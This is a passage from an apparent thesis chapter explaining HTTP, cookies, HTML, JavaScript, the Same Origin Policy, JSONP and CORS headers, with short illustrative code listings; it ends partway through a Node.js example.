language used for generating webpages and handling requests from clients. These are called
server-side programming languages and include for instance PHP [113], ASP.NET [11],
Python [119], Node.js [105]. The server-side language can be used to serve static resources,
or dynamically generate resources and webpages on the fly, based on the characteristics
of a request. Web servers are also usually associated with databases used to manage web
applications and user data. Well known database management systems are MySQL [103],
PostgreSQL [115], Oracle [111], MongoDB [99].
1.2 HTTP protocol
HTTP (HyperText Transfer Protocol) [1] is one of the most used protocols for the com-
munications between web browsers (clients) and web servers. It usually involves a request,
sent from the client (browser) to the server which processes the request and responds.
Among other things, HTTP requests carry information such as (i) the URL (Uniform
Resource Locator) [144] or web address of the resource to be accessed on the server (URLs are
translated into IP addresses); (ii) a method (GET, POST, OPTIONS, HEAD, etc.) which indicates
the action to be applied to the resource; (iii) a list of key/value pair HTTP headers providing
additional information about the request, and optionally (iv) data (the request body) to be
transmitted with the request. Similarly, HTTP responses from the server contain a status code (200, 404, etc.)
that indicates whether the requested resource is available or not, a list of response headers
and the response body (data).
Request headers
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: NID=1234
Response headers
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Set-Cookie: JAR=abcd; expires=Thu, 21-Feb-2019 14:39:31 GMT; path=/; domain=.google.com; HttpOnly; Secure
Content-Security-Policy: default-src ’self’; frame-ancestors ’self’
Table 2.1 – HTTP headers (excerpt) exchanged between the browser (client) and the server
for an access to https://www.google.com. For the purposes of this work, some headers have
been added and some header values changed.
Table 2.1 shows an excerpt of HTTP headers exchanged between the browser and the
server for an access to https://www.google.com. Among the request headers are the
User-Agent header and its value Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0)
Gecko/20100101 Firefox/61.0 which means that the user has a Mozilla Firefox version
61.0 browser running on a Linux (Fedora) computer. The browser is also transmitting
cookies (using the Cookie header) to the server. The Content-Type response header tells
the browser that the accessed resource should be handled as HTML content (that is
to say, a webpage).
HTTP communications are transmitted on the network unencrypted. This opens the door to man-
in-the-middle attacks [91], where an attacker can intercept and modify the communications
between a client and a server. The HTTP protocol is therefore referred to as an insecure protocol.
HTTPS [75] is the secure counterpart of HTTP, where communications are encrypted
between the source and the destination. In this work, we often use HTTP to mean the
protocol in general including its insecure and secure counterparts.
HTTP cookies The HTTP protocol is coined as being stateless [73]. In other words,
when a browser connects to a server to retrieve some data, the server just handles the
request, responds with the appropriate content and forgets about the request it has just
served and the browser which made it. Therefore the server will not make a link between
future requests from the same browser and previous ones [73]. However, most modern
applications rely on the ability to recognize the user’s browser that connects to the web
application servers. In this light, HTTP cookies have been introduced to make HTTP
stateful. A cookie is a piece of information (an identifier) sent by a server in an HTTP
header, i.e. Set-Cookie in Table 2.1, to be stored in a user browser and attached to
subsequent requests (using the Cookie header) between the browser and the server. The
first time a user visits a website, the server returns the requested data as well as the
cookies (using the Set-Cookie header). Later on, future requests to the same server will
automatically be attached the cookies previously stored by the server, allowing the latter
to recognize the user whose browser is connecting to the server. HTTP cookies have
made viable web applications such as e-commerce, and most of the web applications make
extensive use of cookies in order to provide their services to users. In a typical e-commerce
website for instance, a cookie is attached to a user’s browser, allowing the website to track
the list of items the user adds to her basket. On a social network website for example, once
a user is logged in (using her credentials, i.e. her username and password), the server will
store a cookie in the user’s browser and will no longer ask for her credentials. Hence, each
time the user accesses a new page or service of the application, the cookie is used to authenticate
her, in order to authorize the access or not. In Table 2.1 the browser is sending a cookie
previously stored by the server, using the Cookie request header.
Cookies are organized on a per-domain basis. Listing 2.1 below shows an example of a
cookie to be set for google.com and its subdomains.
Set-Cookie: JAR=abcd; expires=Thu, 21-Feb-2019 14:39:31 GMT; path=/; domain=.google.com; HttpOnly; Secure
Listing 2.1 – Example of a cookie to be set for google.com and its subdomains
A variety of information composes the cookie header. The cookie name is JAR and its value is
abcd. It expires on the 21st of February 2019. After this date, the browser will no longer
attach this cookie to requests. The part domain=.google.com means that the cookie will
be attached to requests to the google.com domain and also its subdomains (Section 2 discusses
domains and subdomains). The flag HttpOnly instructs the browser that the cookie must
only be attached to HTTP requests, and not exposed to scripts running in webpages from
google.com and its subdomains. The Secure flag means that cookies must be attached to
HTTPS requests only, and not to insecure HTTP requests.
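As a small illustration (hypothetical cookie names, assuming a script running on a google.com page), scripts can read and set cookies through document.cookie, but a cookie flagged HttpOnly, such as JAR above, never appears there; it only travels in HTTP requests:

document.cookie = "theme=dark; path=/"; // a script-visible cookie
console.log(document.cookie);           // contains "theme=dark" but not JAR, because of HttpOnly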
1.3 Web documents
Web applications are composed of a set of web documents typically written according to the
HyperText Markup Language (HTML) standard [70]. In its current status, the standard is
known as HTML5. Web documents are also usually referred to as HTML documents, pages
or webpages. HTML is a markup language and elements that compose the structure of a
webpage are described with HTML tags. The specification defines among other things, the
semantics of the different tags, the attributes that can be added to the tags (or elements),
and the ability to nest tags in order to create more and more complex webpages. Tags
are typically used in a pair of markups, in particular when the tag can nest other tags or
contain text: the start (opening) tag which contains the attributes, and the end (closing)
tag specifying where the tag declaration stops. Otherwise, when the tag does not accept
any nested tag or text, the closing tag is usually omitted. Nested elements are called the
children, and the nesting element is the parent.
<html>
  <head>
    <title>Title of the page</title>
    <script src="http://third.com/script.js"></script>
    <link rel="stylesheet" href="http://third.com/styles.css">
  </head>
  <body>
    <p>First paragraph</p>
    <img src="http://third.com/picture.png" alt="Picture">
    <iframe src="http://third.com/iframe.html"></iframe>
  </body>
</html>
Listing 2.2 – Example of an HTML document
Listing 2.2 shows an example of a simple HTML document. The html tag is the root
element of the document in which are nested the head and body elements. The title of the
page, declared with the title element is nested inside the head element. The latter also
nests a script and a link element with different attributes (src, rel, href) and their
related values. In the body element are declared a p tag which indicates a paragraph in the
document, an img element which declares an image, and an iframe element that embeds
another web page in the first page.
To render a webpage (produce the user interface or UI), the browser parses it and produces
a Document Object Model (DOM) [48]. Then each portion of the document is rendered
according to its semantics as defined by the HTML standard. The rendering of some
elements may require the browser to make an HTTP request to fetch their content. This is
the case for instance, when the browser encounters a script, img, iframe element with
asrc attribute, or a link element with a href attribute. Many other elements (audio,
video, source, ...) may also require the browser to make HTTP requests in order to
render them.
In order to build rich web applications as we know today, HTML is usually further associ-
ated with other technologies.
1.4 Cascading Style Sheets (CSS)
The Cascading Style Sheets (CSS) [22] is widely used to describe the presentation (format-
ting and appearance) of HTML elements in a web document: for instance, the color, fonts,
size to use in order to display elements.
CSS files are included in web documents with the link tag (See Listing 2.2), or with the
style tag or even set with the style attribute of HTML elements.
@font-face {
  font-family: "CustomFont";
  src: url("/fonts/customfont.woff2") format("woff2"),
       url("/fonts/customfont.woff") format("woff");
}
div {
  color: black;
  font-family: "CustomFont";
  font-size: 14px;
  background-image: url(http://example.com/background.png);
}
Listing 2.3 – Example of a stylesheet.
Listing 2.3 shows an example of a stylesheet. It loads a font (CustomFont) and applies it to
<div> elements. It also defines the color, font size and background image of all <div>
elements.
1.5 JavaScript
JavaScript (JS) [50] is a prototype-based, multi-paradigm, dynamic, loosely-typed,
interpreted or JIT-compiled programming language, supporting object-oriented
and imperative programming styles, with first-class functions and closures [80]. The lan-
guage defines different constructs such as literals, functions, objects, variables scopes, pro-
totype inheritance, etc. Functions in JavaScript are first-class because they can be assigned
as values to variables and objects, they can be passed as parameters to function calls and
returned as values of functions executions. Closures are inner-functions (a function defined
inside another function called the parent), which in particular can make use of variables
defined in the scope of the parent.
JavaScript dynamic features
JavaScript has many dynamic features. Unlike object-oriented languages such as Java
where objects are created out of classes using the new construct, objects in JavaScript can
be defined in many other ways: object literal expressions, or definitions via the Object
object. Functions can also be dynamically created with the Function object. Inheritance
a-la-JavaScript is a prototype-based inheritance. Any object can be the prototype of any
other object, and objects may have no prototype. When a property is not directly defined
in an object, the prototype chain is traversed in order to look it up.
One of the most dynamic features of JavaScript is undoubtedly the eval function. It takes
as an argument a string, turns it into code and executes it. Likewise, functions such as
setTimeout, setInterval, Function also dynamically turn strings into code. We refer
to them as eval-like functions. They are among the most interesting but also the most
challenging features of JavaScript, when it comes to analyzing JavaScript programs [210,
240]. These functions pose a lot of security issues in JavaScript applications, as their use
can allow an attacker to execute arbitrary code in web applications.
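The following lines (a toy illustration, not code from an analyzed application) show how these eval-like functions turn strings into executable code:

const payload = "console.log(document.cookie)";          // imagine this string comes from an attacker
eval(payload);                                            // the string is executed as code
setTimeout("console.log('also evaluated as code')", 0);   // a string callback is evaluated too
const double = new Function("x", "return x * 2");         // builds a function from strings
console.log(double(21));                                  // 42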
The web programming language
JavaScript is the defacto programming language of the web, implemented by browsers and
extensively used in websites [153,229] to make HTML documents interactive. The script
tag serves to include scripts (JavaScript programs) in a webpage. JavaScript is also used by
non-browser environments such as Node.js [105]. JavaScript programs manipulate webpages
thanks to the DOM API of the webpage that browsers expose to them. They can register
event listeners or callbacks (functions) that are invoked in reaction to events occurring in
the webpage (a mouse move, a user click on an element, a network event). The DOM is
accessible via the document object, which they can use to query for HTML elements in the
page, add, remove or change elements and their attributes. In the listing below, the text
of the first paragraph in a webpage is changed to New paragraph text.
document.getElementsByTagName("p")[0].innerText = "New paragraph text"
The document object is in reality a property of the global object window, whose properties
contain different information about a webpage and the browser in which it is rendered.
Different aliases are sometimes used to refer to the window object: this, self, global (depending on the context: this and self are exactly the global window object only when used outside of any function, that is, in the global scope [80]).
1.6 Browsing contexts
A browsing context is an execution environment where browsers load and render a web
document [19]. A browser tab or window corresponds to a browsing context. Tabs and
windows represent the User Interface (UI) of a webpage. Associated to a browsing context
are a set of resources and a common memory. In particular, scripts running in the context
of a page have access to all objects and data related to the context.
A webpage can be embedded into another webpage, using an HTML iframe (as shown
in Listing 2.2) or frame tag. The embedded document will be placed inside a different
browsing context, called a nested browsing context. The embedding document is called
the parent or top-level context, and the embedded document the child or nested context.
A browsing context that has no parent is called a top-level browsing context, others are
nested browsing contexts. An iframe can further embed another iframe and so forth,
causing different levels of nested browsing contexts [19]. Nested browsing contexts are
rendered in the UI of their parent context.
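For instance (a small sketch reusing the third party URL of Listing 2.2), a script in a top-level page can create a nested browsing context and inspect how contexts relate to each other:

const child = document.createElement("iframe");
child.src = "http://third.com/iframe.html"; // the embedded page gets its own nested browsing context
document.body.appendChild(child);
console.log(window.top === window); // true: this script runs in the top-level browsing context
console.log(window.frames.length);  // number of directly nested browsing contexts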
2 The Same Origin Policy
The Same Origin Policy (SOP) is a fundamental security mechanism implemented by web
browsers [125]. Among other things, it defines (i) the ability to include third party content
in webpages, (ii) the ability for a webpage to interact with third party servers in order to
load data, and (iii) the interactions between browsing contexts.
2.1 Origin
Browsers associate web applications and their resources (pages, files, content, data) to a
single origin. Resources that have the same origin are called same-origin resources, other-
wise they are considered cross-origin resources. An origin is usually made of 3 components
of a URL [144]: the scheme or protocol, the host or domain name and the port number.
Let us consider the URL https://user:pass@sub.host.com:8080/p/a/t/h?query=string#hash.
The host or domain name (sub.host.com) is the name of the machine (server) hosting
the resource (it is later converted to an IP address). A domain name is further divided into
different parts or levels, with the TLD (top-level domain) being the final component of the
domain name. In our example, com is the top-level domain (TLD), host.com the second level domain (TLD+1). Third
and higher level domains are called sub domains (i.e. sub.host.com). Cookies for instance
are organized by hosts in browsers (See Section 1.2). The scheme is the communication
protocol used by browsers (clients) and servers to exchange data. In our example, https
is the scheme of the URL. Different communication protocols are associated to different
schemes (http for the HTTP protocol, https for the HTTPS protocol, ftp for the FTP
protocol, ...). Finally, the port is a unique number that identifies a network-based applica-
tion (an application that uses the network to communicate with different entities) running
on a machine. In our case, the network-based application is the web server which commu-
nicates with web browsers. By default, different protocols are associated with specific port
numbers: the HTTP protocol with port 80 and the HTTPS protocol with port 443. Hence,
a URL whose protocol is http but does not include a port number is implicitly associated
with the port number 80. URLs also contain additional information such as the path to
the resource being accessed, query strings or URL parameters (additional data passed in
the URL), user credentials (user name and password), etc. A web application or website is
typically a collection of web resources sharing a common domain name.
3. This depends on the context: this and self are exactly the global window object when used outside of
any function, that is, in the global scope [80].
4. The domain name is later resolved to an IP address.
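As an illustration, the components that make up an origin can be extracted programmatically
with the standard URL API available in browsers and Node.js; the sketch below uses the example
URL discussed above.
// A minimal sketch: extracting the components that form an origin.
var url = new URL("https://user:pass@sub.host.com:8080/p/a/t/h?query=string#hash");
console.log(url.protocol); // "https:"  (the scheme)
console.log(url.hostname); // "sub.host.com"  (the host)
console.log(url.port);     // "8080"
console.log(url.origin);   // "https://sub.host.com:8080"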
Remote and inline content
Schemes can be grouped into two main categories: network and local schemes [54]. Network
schemes include the HTTP(S) schemes (http, https), ftp, ws and wss, while local schemes
include about, blob, data, file, filesystem and javascript, among others. A resource
which is embedded in a webpage with a network-scheme URL requires the browser to
connect to the server hosting the resource (using the communication protocol corresponding
to its scheme) in order to fetch the content of the resource. Local-scheme URLs or
URIs (Uniform Resource Identifiers) [143], on the other hand, are URLs which do not
trigger a network communication. The following listing shows the inclusion of a data URI
image in a webpage [45].
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" alt="Red dot" />
The content of the image is wholly contained in the URL: the browser only has to decode
and render it, without making a connection to a remote server. We refer to content with
network-scheme URLs as remote or external content; in the case of JavaScript, we refer
to such scripts as external libraries [153,229]. Otherwise, when the URL scheme is a local
scheme, we refer to the content as inline content.
It is worth noting the case of inline scripts, stylesheets and iframes, which can also be
declared without any URL. The <style> tag is used for declaring inline stylesheets. An
inline script is a script whose <script> tag does not have any src attribute. Its content
(code) is directly indicated between the start and end tag. Inline iframes can also be
created using JavaScript document.createElement, document.write APIs [10].
Also important is the srcdoc attribute introduced in HTML5 [203] for creating inline
iframes. The content of the iframe is directly indicated in the srcdoc attribute. Note that
the srcdoc attribute takes precedence over the src attribute when both are specified on
an <iframe> element. Browsers supporting both attributes will ignore src in the presence of
srcdoc [203].
2.2 Cross-origin embeddings
The Same Origin Policy defines rules regarding the inclusion (embedding) of cross-origin
resources in a webpage [125]. A cross-origin or third party resource is a resource whose
origin is different from that of the page in which it is embedded (say, a resource included
in a page using an HTML tag). If a page whose URL is http://example.com embeds a
script with the URL http://third.com/script.js, then the script is considered a third
party or cross-origin script. The page itself is usually referred to as the first party.
The SOP allows the inclusion of third party content in a webpage. This has many security
implications.
— Once loaded, a third party script will execute with the same privileges as first party
scripts. In other words, it can access and manipulate any data, object, the DOM and
any API exposed to the page, as if it was loaded from the page’s own origin.
— Cookies sent by the third party server in response to the request to fetch (load) the
third party resource will be associated with the third party domain, and not with the first
party domain. Third party scripts can nonetheless access the
first party cookies via JavaScript APIs such as document.cookie [49].
When the embedded resource is a cross-origin iframe, then the iframe is loaded inside a
cross-origin browsing context.
Interactions between browsing contexts
The Same Origin Policy also governs the interactions between different (nested) browsing
contexts. It allows a script in a browsing context to directly access other same-origin
contexts and their related data, DOMs, etc. For instance, a script in a page can access
and manipulate the DOM of an iframe from the same origin and vice versa. Similarly, two
same-origin iframes, embedded in a page, can directly access each other’s context.
Cross-origin interactions, however, are disallowed by the SOP. Nonetheless, it is worth men-
tioning the case of subdomains. When two cross-origin contexts differ only in their full
domain names, while sharing the same second-level domain (TLD+1), they can
relax their origins in order to enable direct interactions with each other’s browsing con-
text. Assume that the origins of the two cross-origin contexts are http://sub.host.com
and http://www.host.com. Since their common TLD+1 component is host.com, both
pages can execute
document.domain = "host.com"
in order to become same-origin contexts and directly access each other’s context. Both
contexts are now associated with the same origin http://host.com, allowing them to interact.
This is referred to as relaxing an origin. Note that even if the origin of one of the contexts
was already http://host.com, that context must also explicitly relax its origin to be able
to interact with subdomains which have relaxed their origins into http://host.com.
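The following sketch illustrates this relaxation, assuming a page on http://www.host.com that
embeds an iframe from http://sub.host.com; both documents must execute the relaxation before
either can reach into the other’s context.
// In the parent page (http://www.host.com) and in the iframe (http://sub.host.com):
document.domain = "host.com"; // both contexts relax their origin to host.com

// Afterwards, the parent can directly access the iframe's DOM:
var frame = document.getElementsByTagName("iframe")[0];
frame.contentDocument.body.style.background = "yellow";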
Cross-origin communications
If cross-origin browsing contexts do not have direct access to one another’s browsing con-
text, they can however communicate by exchanging messages. This also applies to same-
origin contexts. Message exchanges or message passing are achieved with the cross-origin
communication postMessage API [116]. Below is a listing showing how to use this API,
where message is the message or data to send, and origin is the origin of the contexts the
message is to be sent to.
postMessage(message, origin)
Messages are dispatched on a per-origin basis. That is, all contexts whose origin matches
that of the origin parameter (the second parameter) will receive the message. To send
the message to all contexts, one can specify * as the value of the origin parameter.
To receive messages, browsing contexts have to register listeners for events triggered by
incoming messages, as shown in the listing below.
addEventListener("message", function(event) {
  message = event.data;
  origin = event.origin;
});
A sent message triggers a message event in the destination contexts. The message
and the origin of the context that sent it are accessible from the event
object, as shown in the listing above.
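As an illustration, the following sketch sends a message from an embedding page to its iframe
and shows a receiver that checks the origin of incoming messages before using them; the origins
used are only illustrative.
// Sender, in the embedding page (here assumed to be http://example.com):
var frame = document.getElementsByTagName("iframe")[0];
frame.contentWindow.postMessage("hello", "http://other.com"); // only delivered to that origin

// Receiver, in the iframe loaded from http://other.com:
addEventListener("message", function (event) {
  if (event.origin !== "http://example.com") return; // ignore unexpected senders
  console.log("Received:", event.data);
});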
Sandboxing iframes
The HTML5 specification [70] introduced the sandbox attribute to be used with the <iframe>
tag.
<iframe src="http://example.com/iframe.htm" sandbox></iframe>
Listing 2.4 – Sandboxing an iframe
The sandbox attribute, as shown in Listing 2.4, applies many restrictions on the nested
browsing context of the iframe, and has among other things, the effect of altering the
origin of the iframe context. Instead of http://example.com as an origin, as one may
expect, the iframe now has a different origin called a unique origin. The main property of
a unique origin is that it does not match any other origin, not even another unique origin.
Hence, a unique origin is considered a cross-origin compared to any other origin. The
SOP therefore disallows access from an origin to a unique origin context and vice versa.
Cross-origin communications can nonetheless be set up with unique origins.
The sandbox attribute also prevents the iframe from loading plugins, scripts, submitting
forms, displaying popups, navigating the top-level context, etc. Most of these default
restrictions can be relaxed by adding specific values (flags) to the attribute.
— The value allow-same-origin of the sandbox attribute gives back to the sandboxed
context, its expected origin. The iframe of Listing 2.4 would no longer be assigned a
unique origin, but rather http://example.com as expected.
— The value allow-scripts re-enables script execution inside the sandboxed context.
— The value allow-forms re-enables form submissions.
It is worth mentioning that any context further nested inside a sandboxed iframe
inherits the sandbox restrictions of its top-level contexts, in addition to the sandbox re-
strictions of the nested context itself. For instance, if script execution is not allowed in an
iframe, script execution is also not allowed in any context nested within the sandboxed
iframe.
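For instance, a page can create a sandboxed iframe from a script and selectively relax some of
the restrictions; in the following sketch (with an illustrative URL), scripts and form submissions
are re-enabled while the unique origin is kept.
// A minimal sketch: creating a sandboxed iframe and relaxing some restrictions.
var frame = document.createElement("iframe");
frame.src = "http://example.com/iframe.htm";
frame.setAttribute("sandbox", "allow-scripts allow-forms"); // no allow-same-origin: unique origin kept
document.body.appendChild(frame);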
2.3 Cross-origin reads
This refers to the ability to load cross-origin data in the context of a web page. AJAX
(Asynchronous JavaScript + XML) [12] involves the use of various technologies that enable
scripts executing in a webpage to connect to web servers in order to submit and fetch data
and update the user interface, without having to reload the page. In comparison, the use of
HTML forms [71] for sending and receiving information has the inconvenience of causing
webpages to reload.
AJAX requests are made using JavaScript objects such as XMLHttpRequest [155] or fetch [54].
Listing 2.5 shows a simple AJAX request made using the fetch API.
fetch("http://host.com/data");
Listing 2.5 – Simple AJAX request using the fetch API
By default, the SOP does not allow cross-origin AJAX requests. Hence, a webpage from
an origin cannot use AJAX to fetch data on a web server of a different origin (cross-origin).
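For completeness, the same request as in Listing 2.5 could also be issued with the older
XMLHttpRequest object mentioned above; the following sketch is a minimal equivalent and,
like the fetch version, is subject to the SOP.
// Equivalent request using XMLHttpRequest instead of fetch.
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://host.com/data");
xhr.onload = function () {
  console.log(xhr.responseText); // the response body, once received
};
xhr.send();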
JSONP
One of the most used techniques to circumvent the restriction on cross-origin reads is
JSONP (JavaScript Object Notation with Padding) 5. This hack relies on the fact that
the Same Origin Policy does not prevent the inclusion of third party (cross-origin) scripts
(See Section 2.2). To
load third party data with JSONP, one injects in the page a script whose URL parameters
include the name of a JavaScript function defined in the context of the page. This function
specifies how the data returned by the web server will be handled. The listing below shows
the inclusion of a script to load JSONP data. The URL is passed the parameter callback
whose value foo is the JavaScript function to be called to handle the data returned by the
server.
<script src="http://third.com/script.js?callback=foo"></script>
The third party server then generates a response which contains the name of the function
to which it passes the data as an argument, as shown in the following listing.
foo(cross-origin-data);
When the response is returned to the browser, the function foo will be invoked and the
data handled according to the definition of the function. The main limitation of JSONP
lies in the possibilities that it offers: only the HTTP GET method can be used for making
requests, so data can only be submitted as URL parameters. Compared to
AJAX requests, JSONP offers far fewer possibilities. To enable cross-origin AJAX requests,
the Cross-Origin Resource Sharing (CORS) mechanism has been introduced.
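Putting the pieces together, the following sketch shows how a page could load JSONP data by
defining the callback function and injecting the script dynamically; the endpoint is the illustrative
one used in the listings above.
// A minimal JSONP client sketch.
function foo(data) {            // callback invoked by the script returned by the server
  console.log("Received:", data);
}
var script = document.createElement("script");
script.src = "http://third.com/script.js?callback=foo";
document.body.appendChild(script); // the response, e.g. foo({...}), executes as a script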
3 Cross-Origin Resource Sharing (CORS)
Cross-Origin Resource Sharing (CORS) [34] is a refinement of the Same Origin Policy. It
involves the exchange of dedicated HTTP headers between web browsers and web servers,
in order for the latter to authorize (or not) cross-origin AJAX requests. Before CORS,
the SOP mandated that browsers block cross-origin requests. With CORS, the control is
given to web servers. In particular, the browser indicates to the target server, the origin
of the webpage making the cross-origin request. The server can then decide whether it
accepts requests from that origin (cross-origin requests). It is important to note here that
web servers have full control over accepting or rejecting CORS requests.
To work, CORS must be implemented both by browsers and by web servers. However,
CORS is fully backwards compatible: if either the browser or the web server does not im-
plement the mechanism, the browser falls back to the traditional SOP by blocking
cross-origin requests 6.
3.1 Types of CORS requests: simple and preflighted
CORS is defined in the Fetch specification [55] and many online resources discuss how to
deploy and use it [33,127,148]. There are two types of CORS requests: simple and preflighted requests.
5. The technique is named JSONP because it was mostly meant for loading data with the JSON format.
However, it can be used to load other types of data that can be handled by a JavaScript program such as
texts, numbers, XML, etc.
6. If the browser supports CORS, it will always attempt to make the cross-origin request. If the web
server responds with CORS headers, the browser enforces them; otherwise, it falls back to the SOP. This
may seem inefficient when the web server does not support CORS at all, because a round-trip request from
the browser to the server is still made: there is no HTTP header with which a web server can express, for
instance, that it does not accept cross-origin requests at all.
Preflighted requests require two requests in order to be fulfilled: the browser first
makes a preflight request, and then makes the effective CORS request.
Simple CORS requests are those that basically have the same characteristics as HTTP
requests already possible with HTML forms [54]. Hence, in simple requests:
— only 3 HTTP methods are allowed: GET, POST and HEAD
— only a predefined set of HTTP headers can be used (Accept, Content-Language,
...). The type of data that can be transmitted in simple CORS requests, using the
Content-Type request header, can only be application/x-www-form-urlencoded,
multipart/form-data, and text/plain 7.
As an analogy, simple CORS requests can be understood as a way of submitting and
fetching HTML form data without reloading a webpage.
As mentioned above, requests that are more elaborate than simple CORS requests are
preflighted CORS requests. This is the case when the AJAX request uses an HTTP
method other than GET, POST and HEAD, or uses custom HTTP headers other than those
allowed in simple requests 8.
In order to fulfill preflighted requests, browsers actually make 2 sequential requests. A
first preflight request, made using the OPTIONS HTTP method, is sent to the cross-origin
server, to notify it about the characteristics of the preflighted requests that the webpage
is willing to make (i.e. the webpage wants to communicate using an HTTP method other
than GET, POST or HEAD, or it wants to send some custom HTTP headers). When the server
authorizes the preflight request (by responding with dedicated HTTP headers), then the
browser will send the effective CORS request, using the specific method and custom HTTP
headers.
Finally, by default, CORS requests are made without including the credentials (cookies
and authorization tokens) that may have been previously set by the server in the user
browser. However, webpages can instruct that CORS requests be made with credentials.
In this case, the browser will add the cross-origin server credentials to the CORS request.
Nonetheless, the server has here again full control and can accept or deny the request
with credentials. Note that requests with credentials are sensitive. If authorized by the
server, they allow a webpage from an origin to access potential user data on cross-origin
web applications.
3.2 CORS headers
Table 2.2 presents the different headers used for making CORS requests [40,55]. Intu-
itively, there is a one-to-one correspondence between each CORS request header sent by
the browser, and the dual used by the web server to respond in order to authorize or not
the cross-origin request.
Origin of the request First of all, the Origin request header is always added to cross-
origin requests. It tells the web server about the origin of the webpage from which the
cross-origin request is being made.
fetch("http://third.com");
Listing 2.6 – Simple CORS request without credentials, made using the fetch object
7. These are the possible data types for HTML forms
8. Using ReadableStream object or registering an event listener on an XMLHttpRequestUpload object
also triggers preflighted requests [33]
Request headers                    Response headers
Origin                             Access-Control-Allow-Origin
Access-Control-Request-Method      Access-Control-Allow-Methods
Access-Control-Request-Headers     Access-Control-Allow-Headers
-                                  Access-Control-Expose-Headers
-                                  Access-Control-Max-Age
Cookie, Authorization              Access-Control-Allow-Credentials
Table 2.2 – CORS headers exchanged between web browsers and servers. In many cases,
there is a one-to-one correspondence between the request and response headers: the
browser sends a header, and the server uses its dual to authorize or reject cross-origin
requests.
Consider the request in Listing 2.6. If it is made by a webpage whose URL is http:
//example.com:8080/home.htm, then the browser will add to the cross-origin request, the
header Origin and set its value to http://example.com:8080, which is the origin of the
webpage. The target web server (http://third.com) then knows the origin of the request.
If it accepts requests from pages with this origin, it can express this to the browser by using
the Access-Control-Allow-Origin response header. There are two possible values for
the Access-Control-Allow-Origin header: either * or the same value as that of the
Origin header (that is, http://example.com:8080 in our example). In the second case,
the Access-Control-Allow-Origin and Origin headers match because
they carry the same value; in the first case, * matches any origin. In either case, the
cross-origin request is authorized by the server. Any other value returned by the server
for the Access-Control-Allow-Origin header, or the absence of this header, is
interpreted by the browser as an unauthorized cross-origin request.
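On the server side, authorizing such a request essentially amounts to echoing an acceptable
origin back to the browser. The following Node.js sketch is a simplified, hypothetical handler for
http://third.com; it is meant as an illustration, not a complete CORS implementation.
// A minimal Node.js sketch of a server authorizing a specific origin.
const http = require("http");

http.createServer(function (req, res) {
  const origin = req.headers["origin"];
  if (origin === "http://example.com:8080") {
    // Echo the origin back (alternatively "*" for any origin, without credentials).
    res.setHeader("Access-Control-Allow-Origin", origin);
  }
  res.end("some data");
}).listen(8000);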
Custom HTTP headers and methods Consider the CORS request in Listing 2.7,
that makes use of the method PUT. This request is a preflighted request because of the
method PUT, which is not allowed in simple CORS requests.
fetch("http://third.com", {
  method: "PUT"
});
Listing 2.7 – Preflighted request, because of the use of PUT method in the request
Therefore, a preflight request is first made. In addition to the Origin header, the browser
also adds the Access-Control-Request-Method header to the request. The value of this
header is the PUT method, which tells the server about the method the client is willing to
use to make the cross-origin request. To authorize the use of this method, in addition to the
Access-Control-Allow-Origin header, the server adds the Access-Control-Allow-Methods
header to its response. The value of this header must be a comma-separated list of allowed
HTTP methods that includes PUT as a value 9.
Similarly, the Access-Control-Request-Headers header is used in a preflight request to indicate
to the web server that the client would like to make a request with custom HTTP head-
ers. Listing 2.8 shows an example of a request that will be preflighted because the value
application/json of the Content-Type header is not allowed in simple CORS requests.
fetch("http://third.com", {
  method: "POST",
  headers: {
    "Content-Type": "application/json"
  },
  body: "..."
});
Listing 2.8 – Preflighted request, because application/json as a value for the
Content-Type header is not allowed in simple CORS requests.
9. The value of the header can also be only the PUT method.
In this case also, the browser makes a first preflight request. In addition to the Origin
header, it also adds the Access-Control-Request-Headers header, with Content-Type as
its value. In case of multiple custom headers, the browser adds all of them as values of the
Access-Control-Request-Headers header, separating them with a comma. To authorize
requests with the custom headers, the server sends the Access-Control-Allow-Headers
header, whose value is a comma-separated list of headers containing the headers sent in
the Access-Control-Request-Headers header. A custom header is allowed if it is listed among the
Access-Control-Allow-Headers header values.
Additional response headers can be added by the server in the responses to preflight re-
quests. The value of the Access-Control-Expose-Headers header is a list of response
headers that the server authorizes the browser to make visible to the webpage which
issued the request. The value of the Access-Control-Max-Age header indicates a number
of seconds during which the response to the preflight request can be cached by the browser.
Until this delay expires, the browser is allowed to omit the preflight request for similar
preflighted requests to the same server.
After a successful preflight request, the browser makes the effective CORS request, with
the authorized methods and headers.
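A server willing to accept such preflighted requests answers the OPTIONS request with the
corresponding Access-Control-Allow-* headers. The following Node.js sketch is again a simplified
illustration under the assumptions of the listings above, not a production-ready implementation.
// A minimal Node.js sketch answering preflight (OPTIONS) requests.
const http = require("http");

http.createServer(function (req, res) {
  res.setHeader("Access-Control-Allow-Origin", "http://example.com:8080");
  if (req.method === "OPTIONS") {
    res.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT");
    res.setHeader("Access-Control-Allow-Headers", "Content-Type");
    res.setHeader("Access-Control-Max-Age", "600"); // cache the preflight for 10 minutes
    res.end();
    return;
  }
  res.end("response body"); // handle the effective CORS request here
}).listen(8000);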
Requests with credentials By default, CORS requests are made without adding the
credentials of the cross-origin server to the requests. However, the webpage issuing the
request can explicitly instruct the browser to include the server’s credentials, as shown in
Listing 2.9.
fetch("http://third.com", {
  credentials: "include"
});
Listing 2.9 – Making a CORS request with credentials, using the fetch API
In this case, the browser will add any credentials (cookies, authorization keys) previously
set by the web server in the user browser. To accept the request with credentials, the
web server returns the Access-Control-Allow-Credentials response header, setting its
value to true. It must also explicitly set the origin of the webpage as the value of the
Access-Control-Allow-Origin response header, and not use the * wildcard 10. Otherwise,
the request fails.
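On the server side, accepting such a credentialed request could look like the following simplified
Node.js sketch: the exact origin is echoed back and the * wildcard is avoided.
// A minimal sketch: authorizing a CORS request with credentials.
const http = require("http");
http.createServer(function (req, res) {
  // Echo the exact origin; "*" is not allowed for credentialed requests.
  res.setHeader("Access-Control-Allow-Origin", "http://example.com:8080");
  res.setHeader("Access-Control-Allow-Credentials", "true");
  res.end("user-specific data");
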